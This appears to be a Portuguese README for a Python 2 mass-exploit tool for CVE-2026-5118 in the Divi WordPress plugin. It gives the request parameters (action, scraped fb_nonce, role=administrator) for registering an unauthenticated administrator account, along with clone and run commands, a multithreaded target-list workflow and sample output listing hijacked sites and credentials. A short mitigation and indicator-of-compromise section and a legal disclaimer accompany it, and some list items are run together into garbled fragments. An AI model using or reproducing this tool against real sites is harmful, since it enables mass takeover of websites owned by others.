
CVE-2026-5118 – Exploit em massa Python2 para o plugin Divi WordPress, registro de administrador não autenticado via admin-ajax.php. Scanner multithread com extração de nonce.
⚠️ AVISO: Esta ferramenta destina-se apenas a testes de penetração autorizados e pesquisa de segurança.
O acesso não autorizado a sistemas informáticos é ilegal. Utilize apenas em sistemas que possua ou para os quais tenha permissão explícita por escrito para testar. Mais avisos legais podem ser consultados na capa do Jenderal92. Pode verificá-los AQUI !!!
Este script em Python 2 explora uma vulnerabilidade de escalação de privilégio no plugin WordPress Divi (e formulários Divi relacionados). Permite o registo remoto de uma conta de administrador através de:
fb_nonce do formulário de registo Divi do alvo./wp-admin/admin-ajax.php com role=administrator.https:// se estiver em falta.de_fb_obj).success, user_id, user created, etc.).results.txt no formato:https://target.com/wp-admin/ | username | passwordurllib2, Queue, threading – não é compatível com Python 3 sem modificações)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
Crie um ficheiro de texto com um domínio ou URL por linha. Pode omitir http:// / https:// – o script adicionará https:// por padrão.
Exemplo targets.txt:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://192.168.1.100/wordpress
[3] FAILED http://192.168.1.100/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
Pode personalizar as seguintes variáveis no topo do script:
https:// se nenhum esquema for fornecido.fb_nonce usando padrões regex.multipart/form-data contendo:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<nonce extraído>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailPara administradores WordPress que utilizam Divi:
admin-ajax.php.role que possa ser manipulado.Indicadores de comprometimento (IOCs):
admin-ajax.php com action=de_fb_ajax_submit_ajax_handlerAttacker)role=administrator nos registos de acessoEste software é fornecido apenas para fins educacionais e testes de segurança autorizados. O autor não assume qualquer responsabilidade por uso indevido ou danos causados por esta ferramenta. Ao utilizar este software, concorda em:
A violação destes termos pode resultar em processo criminal, multas ou prisão.
Solicitações de pull são bem-vindas para melhorias (porta para Python 3, melhor extração de nonce, deteção adicional de caminhos de registo). Por favor, mantenha o aviso legal ético.
| Variável | Padrão | Descrição |
|---|
DEFAULT_USERNAME | Attacker | Nome de utilizador a registar |
DEFAULT_PASSWORD | Attacker@123#+ | Palavra-passe (forte com caracteres especiais) |
DEFAULT_EMAIL | [email protected] | Endereço de email |
THREAD_COUNT | 20 | Número de threads concorrentes |
OUTPUT_FILE | results.txt | Ficheiro para guardar os alvos com sucesso |